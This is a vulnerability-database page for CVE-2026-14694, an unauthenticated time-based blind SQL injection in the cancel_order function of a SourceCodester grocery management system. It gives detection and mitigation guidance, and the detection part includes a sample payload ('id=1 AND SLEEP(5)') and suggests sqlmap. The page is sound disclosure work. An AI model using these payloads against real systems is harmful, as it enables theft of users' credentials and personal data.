CVE-2026-14694
Received Received - Intake

SQL Injection in Multi-Vendor Online Grocery Management System

Vulnerability report for CVE-2026-14694, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-05

Last updated on: 2026-07-05

Assigner: VulDB

Description

A vulnerability has been found in SourceCodester Multi-Vendor Online Grocery Management System 1.0. Affected by this issue is the function cancel_order of the file classes/Master.php of the component POST Parameter Handler. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-05
Last Modified
2026-07-05
Generated
2026-07-05
AI Q&A
2026-07-05
EPSS Evaluated
N/A
NVD
EUVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
sourcecodester multi-vendor_online_grocery_management_system 1.0

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
CWE-89 The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

This vulnerability is a time-based blind SQL injection found in the cancel_order function of the Multi-Vendor Online Grocery Management System version 1.0. It occurs because the id parameter from a POST request is directly embedded into a SQL UPDATE statement without any sanitization or parameterization. This allows an attacker to inject malicious SQL code remotely.

Since the system does not return data in the response, classic SQL injection techniques are ineffective, but attackers can use time-based inference methods, such as MySQL's SLEEP() function, to confirm the vulnerability and extract sensitive information.

The root cause is the use of PHP's extract($_POST) to assign the id parameter directly into the SQL query without validation or prepared statements.

Impact Analysis

This vulnerability can allow an attacker to remotely execute SQL injection attacks to extract sensitive information from the database, including user credentials, personal data, and database schema details.

Because the system allows open public registration and does not require authentication to exploit this vulnerability, any unauthenticated user can potentially dump the entire database using automated tools like sqlmap.

This can lead to data breaches, unauthorized data access, and compromise of the integrity and availability of the system.

Detection Guidance

This vulnerability can be detected by testing the cancel_order endpoint for time-based blind SQL injection. Since the system does not return data in the response, classic SQL injection detection methods are ineffective. Instead, time-based inference techniques, such as injecting MySQL's SLEEP() function, can be used to confirm the vulnerability by observing delays in the server response.

Automated tools like sqlmap can be used to detect and exploit this vulnerability by targeting the id parameter in POST requests to the cancel_order endpoint.

  • Use sqlmap with a POST request targeting the cancel_order endpoint, specifying the id parameter to test for SQL injection.
  • Manually test by sending crafted POST requests with payloads such as id=1 AND SLEEP(5) and observe if the response time is delayed.
Mitigation Strategies

Immediate mitigation steps include sanitizing and validating the id parameter in the cancel_order function and other similarly vulnerable endpoints.

  • Cast the id parameter to an integer using intval() to prevent injection of malicious SQL code.
  • Implement prepared statements with parameterized queries to securely handle SQL commands and prevent injection.
  • Review and fix other endpoints with similar vulnerable patterns, such as delete_cart, update_cart_qty, and delete_users.

Since the vulnerability is exploitable remotely and by unauthenticated users, consider restricting access or applying temporary firewall rules to limit exposure until patches are applied.

Compliance Impact

The SQL injection vulnerability in the cancel_order function allows attackers to extract sensitive information such as user credentials and personal data from the database. This exposure of personal data can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require the protection of personal and sensitive information against unauthorized access and breaches.

Because the vulnerability enables remote exploitation by unauthenticated users and can result in the disclosure of personal data, organizations using the affected system may face legal and regulatory consequences if they fail to secure the system adequately.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-14694. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart